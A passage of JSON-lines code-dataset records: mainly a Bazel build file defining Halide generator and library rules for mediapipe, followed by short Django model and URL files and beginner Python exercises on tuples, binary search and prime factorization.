\"@mediapipe//mediapipe:android\": _android_opts,\n \"@mediapipe//mediapipe:windows\": _msvc_opts,\n })\n\n# Map of halide-target-base -> config_settings\n_HALIDE_TARGET_CONFIG_SETTINGS_MAP = {\n # Android\n \"arm-32-android\": [\"@mediapipe//mediapipe:android_arm\"],\n \"arm-64-android\": [\"@mediapipe//mediapipe:android_arm64\"],\n \"x86-32-android\": [\"@mediapipe//mediapipe:android_x86\"],\n \"x86-64-android\": [\"@mediapipe//mediapipe:android_x86_64\"],\n # iOS\n \"arm-32-ios\": [\"@mediapipe//mediapipe:ios_armv7\"],\n \"arm-64-ios\": [\"@mediapipe//mediapipe:ios_arm64\", \"@mediapipe//mediapipe:ios_arm64e\"],\n # OSX (or iOS simulator)\n \"x86-32-osx\": [\"@mediapipe//mediapipe:ios_i386\"],\n \"x86-64-osx\": [\"@mediapipe//mediapipe:macos_x86_64\", \"@mediapipe//mediapipe:ios_x86_64\"],\n \"arm-64-osx\": [\"@mediapipe//mediapipe:macos_arm64\"],\n # Windows\n \"x86-64-windows\": 
[\"@mediapipe//mediapipe:windows\"],\n # Linux\n \"x86-64-linux\": [\"@mediapipe//mediapipe:linux\"],\n # Deliberately no //condition:default clause here.\n}\n\n_HALIDE_TARGET_MAP_DEFAULT = {\n \"x86-64-linux\": [\n \"x86-64-linux-sse41-avx-avx2-fma\",\n \"x86-64-linux-sse41\",\n \"x86-64-linux\",\n ],\n \"x86-64-osx\": [\n \"x86-64-osx-sse41-avx-avx2-fma\",\n \"x86-64-osx-sse41\",\n \"x86-64-osx\",\n ],\n \"x86-64-windows\": [\n \"x86-64-windows-sse41-avx-avx2-fma\",\n \"x86-64-windows-sse41\",\n \"x86-64-windows\",\n ],\n}\n\ndef halide_library_default_target_map():\n return _HALIDE_TARGET_MAP_DEFAULT\n\n# Alphabetizes the features part of the target to make sure they always match no\n# matter the concatenation order of the target string pieces.\ndef _canonicalize_target(halide_target):\n if halide_target == \"host\":\n return halide_target\n if \",\" in halide_target:\n fail(\"Multitarget may not be specified here\")\n tokens = halide_target.split(\"-\")\n if len(tokens) < 3:\n fail(\"Illegal target: %s\" % halide_target)\n\n # rejoin the tokens with the features sorted\n return \"-\".join(tokens[0:3] + sorted(tokens[3:]))\n\n# Converts comma and dash separators to underscore and alphabetizes\n# the features part of the target to make sure they always match no\n# matter the concatenation order of the target string pieces.\ndef _halide_target_to_bazel_rule_name(multitarget):\n subtargets = multitarget.split(\",\")\n subtargets = [_canonicalize_target(st).replace(\"-\", \"_\") for st in subtargets]\n return \"_\".join(subtargets)\n\n# The second argument is True if there is a separate file generated\n# for each subtarget of a multitarget output, False if not. The third\n# argument is True if the output is a directory (vs. a single file).\n# The fourth argument is a list of output group(s) that the files should\n# be added to.\n\n_is_multi = True\n_is_single = False\n_is_file = False\n\n_output_extensions = {\n \"assembly\": (\"s\", _is_multi, _is_file, []),\n \"bitcode\": (\"bc\", _is_multi, _is_file, [\"generated_bitcode\"]),\n \"c_header\": (\"h\", _is_single, _is_file, [\"generated_headers\"]),\n \"c_source\": (\"halide_generated.cpp\", _is_multi, _is_file, []),\n \"compiler_log\": (\"halide_compiler_log\", _is_single, _is_file, [\"generated_object\", \"generated_compiler_log\"]),\n \"cpp_stub\": (\"stub.h\", _is_single, _is_file, []),\n \"featurization\": (\"featurization\", _is_multi, _is_file, []),\n \"llvm_assembly\": (\"ll\", _is_multi, _is_file, []),\n \"object\": (\"o\", _is_single, _is_file, [\"generated_object\"]),\n \"python_extension\": (\"py.cpp\", _is_single, _is_file, []),\n \"registration\": (\"registration.cpp\", _is_single, _is_file, [\"generated_registration\"]),\n \"schedule\": (\"schedule.h\", _is_single, _is_file, []),\n \"static_library\": (\"a\", _is_single, _is_file, [\"generated_object\"]),\n \"stmt\": (\"stmt\", _is_multi, _is_file, []),\n \"stmt_html\": (\"stmt.html\", _is_multi, _is_file, []),\n}\n\ndef _add_output_file(f, fmt, output_files, output_dict, verbose_extra_outputs, verbose_output_paths):\n if fmt in verbose_extra_outputs:\n verbose_output_paths.append(f.path)\n output_files.append(f)\n if fmt in _output_extensions:\n for group in _output_extensions[fmt][3]:\n output_dict.setdefault(group, []).append(f)\n\nHalideFunctionNameInfo = provider(fields = [\"function_name\"])\nHalideGeneratorBinaryInfo = provider(fields = [\"generator_binary\"])\nHalideGeneratorNameInfo = provider(fields = [\"generator_name_\"])\nHalideGeneratorParamsInfo = 
provider(fields = [\"generator_params\"])\nHalideLibraryNameInfo = provider(fields = [\"library_name\"])\nHalideTargetFeaturesInfo = provider(fields = [\"target_features\"])\n\ndef _gengen_closure_impl(ctx):\n return [\n HalideGeneratorBinaryInfo(generator_binary = ctx.attr.generator_binary),\n HalideGeneratorNameInfo(generator_name_ = ctx.attr.generator_name_),\n ]\n\n_gengen_closure = rule(\n implementation = _gengen_closure_impl,\n attrs = {\n \"generator_binary\": attr.label(\n executable = True,\n allow_files = True,\n mandatory = True,\n cfg = \"exec\",\n ),\n # \"generator_name\" is apparently reserved by Bazel for attrs in rules\n \"generator_name_\": attr.string(mandatory = True),\n },\n provides = [HalideGeneratorBinaryInfo, HalideGeneratorNameInfo],\n)\n\ndef _halide_library_instance_impl(ctx):\n generator_binary = ctx.attr.generator_closure[HalideGeneratorBinaryInfo].generator_binary if ctx.attr.generator_closure else \"\"\n generator_name = ctx.attr.generator_closure[HalideGeneratorNameInfo].generator_name_ if ctx.attr.generator_closure else \"\"\n return [\n HalideFunctionNameInfo(function_name = ctx.attr.function_name),\n HalideGeneratorBinaryInfo(generator_binary = generator_binary),\n HalideGeneratorNameInfo(generator_name_ = generator_name),\n HalideGeneratorParamsInfo(generator_params = ctx.attr.generator_params),\n HalideLibraryNameInfo(library_name = ctx.attr.library_name),\n HalideTargetFeaturesInfo(target_features = ctx.attr.target_features),\n ]\n\n_halide_library_instance = rule(\n implementation = _halide_library_instance_impl,\n attrs = {\n \"function_name\": attr.string(),\n \"generator_closure\": attr.label(\n cfg = \"exec\",\n providers = [HalideGeneratorBinaryInfo, HalideGeneratorNameInfo],\n ),\n \"generator_params\": attr.string_list(),\n \"library_name\": attr.string(),\n \"target_features\": attr.string_list(),\n },\n provides = [\n HalideFunctionNameInfo,\n HalideGeneratorBinaryInfo,\n HalideGeneratorNameInfo,\n HalideGeneratorParamsInfo,\n HalideLibraryNameInfo,\n HalideTargetFeaturesInfo,\n ],\n)\n\ndef _gengen_impl(ctx):\n if _has_dupes(ctx.attr.requested_outputs):\n fail(\"Duplicate values in outputs: \" + str(ctx.attr.requested_outputs))\n\n function_name = ctx.attr.function_name[HalideFunctionNameInfo].function_name if ctx.attr.function_name else \"\"\n generator_binary = ctx.attr.generator_binary[HalideGeneratorBinaryInfo].generator_binary if ctx.attr.generator_binary else \"\"\n generator_name_ = ctx.attr.generator_name_[HalideGeneratorNameInfo].generator_name_ if ctx.attr.generator_name_ else \"\"\n generator_params = ctx.attr.generator_params[HalideGeneratorParamsInfo].generator_params if ctx.attr.generator_params else []\n library_name = ctx.attr.library_name[HalideLibraryNameInfo].library_name if ctx.attr.library_name else \"\"\n target_features = ctx.attr.target_features[HalideTargetFeaturesInfo].target_features if ctx.attr.target_features else []\n\n for gp in generator_params:\n if \" \" in gp:\n fail(\"%s: Entries in generator_params must not contain spaces.\" % library_name)\n\n # Escape backslashes and double quotes.\n generator_params = [gp.replace(\"\\\\\", '\\\\\\\\\"').replace('\"', '\\\\\"') for gp in generator_params]\n\n execution_requirements = {}\n\n # --- Calculate the output type(s) we're going to produce (and which ones should be verbose)\n quiet_extra_outputs = []\n verbose_extra_outputs = []\n if ctx.attr.consider_halide_extra_outputs:\n if \"halide_extra_outputs\" in ctx.var:\n verbose_extra_outputs = 
ctx.var.get(\"halide_extra_outputs\", \"\").split(\",\")\n if \"halide_extra_outputs_quiet\" in ctx.var:\n quiet_extra_outputs = ctx.var.get(\"halide_extra_outputs_quiet\", \"\").split(\",\")\n requested_outputs = sorted(collections.uniq(ctx.attr.requested_outputs +\n verbose_extra_outputs +\n quiet_extra_outputs))\n\n # --- Assemble halide_target, adding extra features if necessary\n base_target = ctx.attr.halide_base_target\n if \",\" in base_target:\n fail(\"halide_base_target should never be a multitarget\")\n if len(base_target.split(\"-\")) != 3:\n fail(\"halide_base_target should have exactly 3 components\")\n\n target_features = target_features + ctx.var.get(\"halide_target_features\", \"\").split(\",\")\n\n if \"no_runtime\" in target_features:\n fail(\"Specifying 'no_runtime' in halide_target_features is not supported; \" +\n \"please add 'add_halide_runtime_deps = False' to the halide_library() rule instead.\")\n\n for san in [\"asan\", \"msan\", \"tsan\"]:\n if san in target_features:\n fail(\"halide_library doesn't support '%s' in halide_target_features; please build with --config=%s instead.\" % (san, san))\n\n # Append the features common to everything.\n target_features.append(\"c_plus_plus_name_mangling\")\n target_features.append(\"no_runtime\")\n\n # Make it all neat and tidy.\n target_features = sorted(collections.uniq(target_features))\n\n # Get the multitarget list (if any) from halide_target_map\n halide_targets = ctx.attr.halide_target_map.get(base_target, [base_target])\n\n # Add the extra features to all of them\n halide_targets = _add_features_to_all(halide_targets, target_features)\n\n leaf_name = ctx.attr.filename.split(\"/\")[-1]\n\n output_files = []\n output_dict = {}\n verbose_output_paths = []\n inputs = []\n\n env = {\n \"HL_DEBUG_CODEGEN\": str(ctx.var.get(\"halide_debug_codegen\", 0)),\n # --define halide_llvm_args=-time-passes is a typical usage\n \"HL_LLVM_ARGS\": str(ctx.var.get(\"halide_llvm_args\", \"\")),\n }\n\n be_very_quiet = ctx.var.get(\"halide_experimental_quiet\", False) # I'm hunting wabbit...\n\n # --- Calculate the final set of output files\n for fmt in requested_outputs:\n if fmt not in _output_extensions:\n fail(\"Unknown Halide output '%s'; known outputs are %s\" %\n (fmt, sorted(_output_extensions.keys())))\n ext, is_multiple, is_dir, _ = _output_extensions[fmt]\n\n # Special-case Windows file extensions\n if \"windows\" in halide_targets[-1]:\n if ext == \"o\":\n ext = \"obj\"\n if ext == \"a\":\n ext = \"lib\"\n if is_multiple and len(halide_targets) > 1:\n for h in halide_targets:\n suffix = _canonicalize_target(h)\n name = \"%s-%s.%s\" % (ctx.attr.filename, suffix, ext)\n f = ctx.actions.declare_directory(name) if is_dir else ctx.actions.declare_file(name)\n _add_output_file(f, fmt, output_files, output_dict, verbose_extra_outputs, verbose_output_paths)\n else:\n name = \"%s.%s\" % (ctx.attr.filename, ext)\n f = ctx.actions.declare_directory(name) if is_dir else ctx.actions.declare_file(name)\n _add_output_file(f, fmt, output_files, output_dict, verbose_extra_outputs, verbose_output_paths)\n\n # --- Progress message(s), including log info about any 'extra' files being output due to --define halide_extra_output\n progress_message = \"Executing generator %s with target (%s) args (%s).\" % (\n generator_name_,\n \",\".join(halide_targets),\n \" \".join(generator_params),\n )\n\n for f in output_files:\n if any([f.path.endswith(suf) for suf in [\".h\", \".a\", \".o\", \".lib\", \".registration.cpp\", \".bc\", 
\".halide_compiler_log\"]]):\n continue\n\n # If an extra output was specified via --define halide_extra_outputs=foo on the command line,\n # add to the progress message (so that it is ephemeral and doesn't clog stdout).\n #\n # (Trailing space is intentional since Starlark will append a period to the end,\n # making copy-n-paste harder than it might otherwise be...)\n if not be_very_quiet:\n extra_msg = \"Emitting extra Halide output: %s \" % f.path\n progress_message += \"\\n\" + extra_msg\n if f.path in verbose_output_paths:\n # buildifier: disable=print\n print(extra_msg)\n\n # --- Construct the arguments list for the Generator\n arguments = ctx.actions.args()\n arguments.add(\"-o\", output_files[0].dirname)\n if ctx.attr.generate_runtime:\n arguments.add(\"-r\", leaf_name)\n if len(halide_targets) > 1:\n fail(\"Only one halide_target allowed when using generate_runtime\")\n if function_name:\n fail(\"halide_function_name not allowed when using generate_runtime\")\n else:\n arguments.add(\"-g\", generator_name_)\n arguments.add(\"-n\", leaf_name)\n if function_name:\n arguments.add(\"-f\", function_name)\n\n if requested_outputs:\n arguments.add_joined(\"-e\", requested_outputs, join_with = \",\")\n\n # Can't use add_joined(), as it will insert a space after target=\n arguments.add(\"target=%s\" % (\",\".join(halide_targets)))\n if generator_params:\n for p in generator_params:\n for s in [\"target\"]:\n if p.startswith(\"%s=\" % s):\n fail(\"You cannot specify %s in the generator_params parameter in bazel.\" % s)\n arguments.add_all(generator_params)\n\n show_gen_arg = ctx.var.get(\"halide_show_generator_command\", \"\")\n\n # If it's an exact match of a fully qualified path, show just that one.\n # If it's * or \"all\", match everything.\n if library_name and show_gen_arg in [library_name, \"all\", \"*\"] and not ctx.attr.generate_runtime:\n # The 'Args' object can be printed, but can't be usefully converted to a string, or iterated,\n # so we'll reproduce the logic here. We'll also take the opportunity to add or augment\n # some args to be more useful to whoever runs it (eg, add `-v=1`, add some output files).\n sg_args = [\"-v\", \"1\"]\n sg_args += [\"-o\", \"/tmp\"]\n sg_args += [\"-g\", generator_name_]\n sg_args += [\"-n\", leaf_name]\n if function_name:\n sg_args += [\"-f\", function_name]\n if requested_outputs:\n # Ensure that several commonly-useful output are added\n ro = sorted(collections.uniq(requested_outputs + [\"stmt\", \"assembly\", \"llvm_assembly\"]))\n sg_args += [\"-e\", \",\".join(ro)]\n sg_args.append(\"target=%s\" % (\",\".join(halide_targets)))\n\n if generator_params:\n sg_args += generator_params\n\n # buildifier: disable=print\n print(\n \"\\n\\nTo locally run the Generator for\",\n library_name,\n \"use the command:\\n\\n\",\n \"bazel run -c opt\",\n generator_binary.label,\n \"--\",\n \" \".join(sg_args),\n \"\\n\\n\",\n )\n\n # Finally... 
run the Generator.\n ctx.actions.run(\n execution_requirements = execution_requirements,\n arguments = [arguments],\n env = env,\n executable = generator_binary.files_to_run.executable,\n mnemonic = \"ExecuteHalideGenerator\",\n inputs = depset(direct = inputs),\n outputs = output_files,\n progress_message = progress_message,\n exec_group = \"generator\",\n )\n\n return [\n DefaultInfo(files = depset(direct = output_files)),\n OutputGroupInfo(**output_dict),\n ]\n\n_gengen = rule(\n implementation = _gengen_impl,\n attrs = {\n \"consider_halide_extra_outputs\": attr.bool(),\n \"filename\": attr.string(),\n \"generate_runtime\": attr.bool(default = False),\n \"generator_binary\": attr.label(\n cfg = \"exec\",\n providers = [HalideGeneratorBinaryInfo],\n ),\n # \"generator_name\" is apparently reserved by Bazel for attrs in rules\n \"generator_name_\": attr.label(\n cfg = \"exec\",\n providers = [HalideGeneratorNameInfo],\n ),\n \"halide_base_target\": attr.string(),\n \"function_name\": attr.label(\n cfg = \"target\",\n providers = [\n HalideFunctionNameInfo,\n ],\n ),\n \"generator_params\": attr.label(\n cfg = \"target\",\n providers = [\n HalideGeneratorParamsInfo,\n ],\n ),\n \"library_name\": attr.label(\n cfg = \"target\",\n providers = [\n HalideLibraryNameInfo,\n ],\n ),\n \"target_features\": attr.label(\n cfg = \"target\",\n providers = [\n HalideTargetFeaturesInfo,\n ],\n ),\n \"halide_target_map\": attr.string_list_dict(),\n \"requested_outputs\": attr.string_list(),\n \"_cc_toolchain\": attr.label(default = \"@bazel_tools//tools/cpp:current_cc_toolchain\"),\n },\n fragments = [\"cpp\"],\n output_to_genfiles = True,\n toolchains = use_cpp_toolchain(),\n exec_groups = {\n \"generator\": exec_group(),\n },\n)\n\ndef _add_target_features(target, features):\n if \",\" in target:\n fail(\"Cannot use multitarget here\")\n new_target = target.split(\"-\")\n for f in features:\n if f and f not in new_target:\n new_target.append(f)\n return \"-\".join(new_target)\n\ndef _add_features_to_all(halide_targets, features):\n return [_canonicalize_target(_add_target_features(t, features)) for t in halide_targets]\n\ndef _has_dupes(some_list):\n clean = collections.uniq(some_list)\n return sorted(some_list) != sorted(clean)\n\n# Target features which do not affect runtime compatibility.\n_IRRELEVANT_FEATURES = collections.uniq([\n \"arm_dot_prod\",\n \"arm_fp16\",\n \"c_plus_plus_name_mangling\",\n \"check_unsafe_promises\",\n \"embed_bitcode\",\n \"enable_llvm_loop_opt\",\n \"large_buffers\",\n \"no_asserts\",\n \"no_bounds_query\",\n \"profile\",\n \"strict_float\",\n \"sve\",\n \"sve2\",\n \"trace_loads\",\n \"trace_pipeline\",\n \"trace_realizations\",\n \"trace_stores\",\n \"user_context\",\n \"wasm_sat_float_to_int\",\n \"wasm_signext\",\n \"wasm_simd128\",\n])\n\ndef _discard_irrelevant_features(halide_target_features = []):\n return sorted(collections.uniq([f for f in halide_target_features if f not in _IRRELEVANT_FEATURES]))\n\ndef _halide_library_runtime_target_name(halide_target_features = []):\n return \"_\".join([\"halide_library_runtime\"] + _discard_irrelevant_features(halide_target_features))\n\ndef _define_halide_library_runtime(\n halide_target_features = [],\n compatible_with = []):\n target_name = _halide_library_runtime_target_name(halide_target_features)\n\n if not native.existing_rule(\"halide_library_runtime.generator\"):\n halide_generator(\n name = \"halide_library_runtime.generator\",\n srcs = [],\n deps = [],\n visibility = [\"//visibility:private\"],\n )\n 
condition_deps = {}\n for base_target, cfgs in _HALIDE_TARGET_CONFIG_SETTINGS_MAP.items():\n target_features = _discard_irrelevant_features(halide_target_features)\n halide_target_name = _halide_target_to_bazel_rule_name(base_target)\n gengen_name = \"%s_%s\" % (halide_target_name, target_name)\n\n _halide_library_instance(\n name = \"%s.library_instance\" % gengen_name,\n compatible_with = compatible_with,\n function_name = \"\",\n generator_closure = \":halide_library_runtime.generator_closure\",\n generator_params = [],\n library_name = \"\",\n target_features = target_features,\n visibility = [\"//visibility:private\"],\n )\n hl_instance = \":%s.library_instance\" % gengen_name\n\n _gengen(\n name = gengen_name,\n compatible_with = compatible_with,\n filename = \"%s/%s\" % (halide_target_name, target_name),\n generate_runtime = True,\n generator_binary = hl_instance,\n generator_name_ = hl_instance,\n halide_base_target = base_target,\n requested_outputs = [\"object\"],\n tags = [\"manual\"],\n target_features = hl_instance,\n visibility = [\"@halide//:__subpackages__\"],\n )\n for cfg in cfgs:\n condition_deps[cfg] = [\":%s\" % gengen_name]\n\n deps = []\n native.cc_library(\n name = target_name,\n compatible_with = compatible_with,\n srcs = select(condition_deps),\n linkopts = halide_runtime_linkopts(),\n tags = [\"manual\"],\n deps = deps,\n visibility = [\"//visibility:public\"],\n )\n\n return target_name\n\ndef _standard_library_runtime_features():\n _standard_features = [\n [],\n [\"cuda\"],\n [\"metal\"],\n [\"opencl\"],\n [\"openglcompute\"],\n [\"openglcompute\", \"egl\"],\n ]\n return [f for f in _standard_features] + [f + [\"debug\"] for f in _standard_features]\n\ndef _standard_library_runtime_names():\n return collections.uniq([_halide_library_runtime_target_name(f) for f in _standard_library_runtime_features()])\n\ndef halide_library_runtimes(compatible_with = []):\n unused = [\n _define_halide_library_runtime(f, compatible_with = compatible_with)\n for f in _standard_library_runtime_features()\n ]\n unused = unused # unused variable\n\ndef halide_generator(\n name,\n srcs,\n compatible_with = [],\n copts = [],\n deps = [],\n generator_name = \"\",\n includes = [],\n tags = [],\n testonly = False,\n visibility = None):\n if not name.endswith(\".generator\"):\n fail(\"halide_generator rules must end in .generator\")\n\n basename = name[:-10] # strip \".generator\" suffix\n if not generator_name:\n generator_name = basename\n\n # Note: This target is public, but should not be needed by the vast\n # majority of users. 
Unless you are writing a custom Bazel rule that\n # involves Halide generation, you most probably won't need to depend on\n # this rule.\n native.cc_binary(\n name = name,\n copts = copts + halide_language_copts(),\n linkopts = halide_language_linkopts(),\n compatible_with = compatible_with,\n srcs = srcs,\n deps = [\n \"@halide//:gengen\",\n \"@halide//:language\",\n ] + deps,\n tags = [\"manual\"] + tags,\n testonly = testonly,\n visibility = [\"//visibility:public\"],\n )\n\n _gengen_closure(\n name = \"%s_closure\" % name,\n generator_binary = name,\n generator_name_ = generator_name,\n compatible_with = compatible_with,\n testonly = testonly,\n visibility = [\"//visibility:private\"],\n )\n\n# This rule exists to allow us to select() on halide_target_features.\ndef _select_halide_library_runtime_impl(ctx):\n f = ctx.attr.halide_target_features\n\n standard_runtimes = {t.label.name: t for t in ctx.attr._standard_runtimes}\n\n f = sorted(_discard_irrelevant_features(collections.uniq(f)))\n runtime_name = _halide_library_runtime_target_name(f)\n if runtime_name not in standard_runtimes:\n fail((\"There is no Halide runtime available for the feature set combination %s. \" +\n \"Please use contact information from halide-lang.org to contact the Halide \" +\n \"team to add the right combination.\") % str(f))\n\n return standard_runtimes[runtime_name][CcInfo]\n\n_select_halide_library_runtime = rule(\n implementation = _select_halide_library_runtime_impl,\n attrs = {\n \"halide_target_features\": attr.string_list(),\n \"_standard_runtimes\": attr.label_list(\n default = [\"@halide//:%s\" % n for n in _standard_library_runtime_names()],\n providers = [CcInfo],\n ),\n },\n provides = [CcInfo],\n)\n\ndef halide_library_from_generator(\n name,\n generator,\n add_halide_runtime_deps = True,\n compatible_with = [],\n deps = [],\n function_name = None,\n generator_params = [],\n halide_target_features = [],\n halide_target_map = halide_library_default_target_map(),\n includes = [],\n namespace = None,\n tags = [],\n testonly = False,\n visibility = None):\n if not function_name:\n function_name = name\n\n if namespace:\n function_name = \"%s::%s\" % (namespace, function_name)\n\n generator_closure = \"%s_closure\" % generator\n\n _halide_library_instance(\n name = \"%s.library_instance\" % name,\n compatible_with = compatible_with,\n function_name = function_name,\n generator_closure = generator_closure,\n generator_params = generator_params,\n library_name = \"//%s:%s\" % (native.package_name(), name),\n target_features = halide_target_features,\n testonly = testonly,\n visibility = [\"//visibility:private\"],\n )\n hl_instance = \":%s.library_instance\" % name\n\n condition_deps = {}\n for base_target, cfgs in _HALIDE_TARGET_CONFIG_SETTINGS_MAP.items():\n base_target_name = _halide_target_to_bazel_rule_name(base_target)\n gengen_name = \"%s_%s\" % (base_target_name, name)\n _gengen(\n name = gengen_name,\n compatible_with = compatible_with,\n consider_halide_extra_outputs = True,\n filename = \"%s/%s\" % (base_target_name, name),\n function_name = hl_instance,\n generator_binary = generator_closure,\n generator_name_ = generator_closure,\n generator_params = hl_instance,\n halide_base_target = base_target,\n halide_target_map = halide_target_map,\n library_name = hl_instance,\n requested_outputs = [\"static_library\"],\n tags = [\"manual\"] + tags,\n target_features = hl_instance,\n testonly = testonly,\n )\n for cfg in cfgs:\n condition_deps[cfg] = [\":%s\" % gengen_name]\n\n # Use a canonical 
target to build CC, regardless of config detected\n cc_base_target = \"x86-64-linux\"\n\n for output, target_name in [\n (\"c_header\", \"%s_h\" % name),\n (\"c_source\", \"%s_cc\" % name),\n ]:\n _gengen(\n name = target_name,\n compatible_with = compatible_with,\n filename = name,\n function_name = hl_instance,\n generator_binary = generator_closure,\n generator_name_ = generator_closure,\n generator_params = hl_instance,\n halide_base_target = cc_base_target,\n library_name = hl_instance,\n requested_outputs = [output],\n tags = [\"manual\"] + tags,\n target_features = hl_instance,\n testonly = testonly,\n )\n\n _select_halide_library_runtime(\n name = \"%s.halide_library_runtime_deps\" % name,\n halide_target_features = halide_target_features,\n compatible_with = compatible_with,\n tags = tags,\n visibility = [\"//visibility:private\"],\n )\n\n native.filegroup(\n name = \"%s_object\" % name,\n srcs = select(condition_deps),\n output_group = \"generated_object\",\n visibility = [\"//visibility:private\"],\n compatible_with = compatible_with,\n tags = tags,\n testonly = testonly,\n )\n\n native.cc_library(\n name = name,\n srcs = [\"%s_object\" % name],\n hdrs = [\n \":%s_h\" % name,\n ],\n deps = deps +\n [\"@halide//:runtime\"] + # for HalideRuntime.h, etc\n ([\":%s.halide_library_runtime_deps\" % name] if add_halide_runtime_deps else []), # for the runtime implementation\n defines = [\"HALIDE_FUNCTION_ATTRS=HALIDE_MUST_USE_RESULT\"],\n compatible_with = compatible_with,\n includes = includes,\n tags = tags,\n testonly = testonly,\n visibility = visibility,\n linkstatic = 1,\n )\n\n # Return the fully-qualified built target name.\n return \"//%s:%s\" % (native.package_name(), name)\n\ndef halide_library(\n name,\n srcs = [],\n add_halide_runtime_deps = True,\n copts = [],\n compatible_with = [],\n filter_deps = [],\n function_name = None,\n generator_params = [],\n generator_deps = [],\n generator_name = None,\n halide_target_features = [],\n halide_target_map = halide_library_default_target_map(),\n includes = [],\n namespace = None,\n tags = [],\n testonly = False,\n visibility = None):\n if not srcs and not generator_deps:\n fail(\"halide_library needs at least one of srcs or generator_deps to provide a generator\")\n\n halide_generator(\n name = \"%s.generator\" % name,\n srcs = srcs,\n compatible_with = compatible_with,\n generator_name = generator_name,\n deps = generator_deps,\n includes = includes,\n copts = copts,\n tags = tags,\n testonly = testonly,\n visibility = visibility,\n )\n\n return halide_library_from_generator(\n name = name,\n generator = \":%s.generator\" % name,\n add_halide_runtime_deps = add_halide_runtime_deps,\n compatible_with = compatible_with,\n deps = filter_deps,\n function_name = function_name,\n generator_params = generator_params,\n halide_target_features = halide_target_features,\n halide_target_map = halide_target_map,\n includes = includes,\n namespace = namespace,\n tags = tags,\n testonly = testonly,\n visibility = visibility,\n )\n","repo_name":"google/mediapipe","sub_path":"third_party/halide/halide.bzl","file_name":"halide.bzl","file_ext":"bzl","file_size_in_byte":31441,"program_lang":"python","lang":"en","doc_type":"code","stars":23977,"dataset":"github-code","pt":"31"} +{"seq_id":"16641465179","text":"from django.db import models\n\nfrom django_extensions.db.models import TimeStampedModel\n\n\nclass Ad(TimeStampedModel):\n TOP = 'top'\n BOTTOM = 'bottom'\n POSITION_CHOICES = (\n (TOP, 'Top'),\n (BOTTOM, 'Bottom'),\n )\n\n description = 
models.CharField(max_length=255, null=True, blank=True)\n    code = models.TextField()\n    position = models.CharField(max_length=10,\n                                null=True,\n                                blank=True,\n                                choices=POSITION_CHOICES)\n\n    def __unicode__(self):\n        return self.description","repo_name":"rwestergren/docker-compose-tor-demo","sub_path":"youtubeadl/apps/core/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":592,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"31"} +{"seq_id":"72446981527","text":"#Exercise 13\n#Write a program that lets the user enter a\n#number a and a tuple t. The program must then display on screen\n#how many times the number a appears in the tuple t.\n\n\nn = int(input(\"Ingrese la cantidad de elementos en la tupla t: \"))\n\nt = ()\nfor i in range(n):\n\tnum = int(input(\"Ingrese un numero a la tupla: \"))\n\tt += (num,)\n\na = int(input(\"Ingrese el numero a contar la cantidad de veces que aparece en la tupla: \"))\n\nprint(\"El numero buscado aparece\", t.count(a), \"veces\")","repo_name":"Kindue/Python-Argentina-Programa","sub_path":"Unidad 3/3.1 Tuplas/Actividades a entregar/Ejercicio13.py","file_name":"Ejercicio13.py","file_ext":"py","file_size_in_byte":515,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"3914211521","text":"# Problem: https://www.acmicpc.net/problem/1920\n# Solved twice \nn = int(input())\nA = set(map(int,input().split()))\n\nm = int(input())\nB = list(map(int,input().split()))\n\nfor i in B:\n    if i in A:\n        print(\"1\")\n    else:\n        print(\"0\")\n\n\n# Another solution, using binary search \nn = int(input())\n\ndataA = list(map(int,input().split()))\n\ndataA.sort()\n\nm = int(input())\n\ndataB = list(map(int, input().split()))\n\ndef binary_search(array, target, start ,end):\n    while start <= end:\n        mid = (start + end) // 2\n        if dataA[mid] == target:\n            return mid\n        elif dataA[mid] < target:\n            start = mid + 1 \n        else: \n            end = mid - 1 \n    return None\n\nfor i in dataB:\n    result = binary_search(dataA, i, 0, n-1)\n    if result == None:\n        print(0)\n    else:\n        print(1)\n\n\n","repo_name":"pjw5521/Coding_Test_Algorithm","sub_path":"Baekjoon_Algorithm/5. Binary Search/1920 수찾기.py","file_name":"1920 수찾기.py","file_ext":"py","file_size_in_byte":762,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"71175868569","text":"def prime_factorization(n):\n    dict = {}\n    list = []\n    number = n\n    divider = 2\n\n    while number != 1:\n        if int(number) % divider == 0:\n            if not divider in dict:\n                dict[divider] = 0\n            dict[divider] += 1\n            number /= divider\n            divider = 2\n        else:\n            divider += 1\n\n    for k, v in dict.items():\n        list.append((k, v))\n\n    return list\n\n\ntests = [\n    (2, [(2, 1)]),\n    (4, [(2, 2)]),\n    (10, [(2, 1), (5, 1)]), # This is 2^1 * 5^1\n    (14, [(2, 1), (7, 1)]),\n    (356, [(2, 2), (89, 1)]),\n    (89, [(89, 1)]), # 89 is a prime number\n    (1000, [(2, 3), (5, 3)])\n]\n\n\nfor n, expected in tests:\n    if expected == prime_factorization(n):\n        print(True)\n    else:\n        print(False)\n","repo_name":"iliyannm/Python-101-Forever","sub_path":"Python Basics/C01P13/Integer prime factorization.py","file_name":"Integer prime factorization.py","file_ext":"py","file_size_in_byte":775,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"35605359844","text":"from django.urls import path\n\nfrom . 
import views\n\napp_name= 'squirrels'\n\nurlpatterns = [\n path('', views.IndexView.as_view(), name='index'),\n path('secret', views.SecretView.as_view(), name='secret'),\n path('newuser', views.signup, name='newuser'),\n path('redeem', views.RedeemView.as_view(), name='redeem'),\n path('leaderboard', views.LeaderboardView.as_view(), name='leaderboard'),\n path('cyoa', views.cyoa, name='cyoa'),\n path('article1', views.Article1View.as_view(), name='tree'),\n path('article2', views.Article2View.as_view(), name='tail'),\n path('article3', views.Article3View.as_view(), name='nuts'),\n path('article4', views.Article4View.as_view(), name='sqrl'),\n path('TAIL', views.TAIL, name='tail_layer'),\n path('TREE', views.TREE, name='tree_layer'),\n path('NUTS', views.NUTS, name='nuts_layer'),\n path('SQRL', views.SQRL, name='sqrl_layer'),\n path('chatter', views.chatter, name='chatter'),\n path('WATCHING', views.watching, name='watching'),\n path('SQRLDATABASE', views.sqrldatabase, name='sqrldatabase'),\n path('WINRARNOTFOUND', views.winrarnotfound, name='winrarnotfound'),\n path('WHOLEHEARTEDLY', views.wholeheartedly, name='wholeheartedly'),\n path('FLOWERS', views.flowers, name='flowers'),\n path('CRACKTHENUT', views.crackthenut, 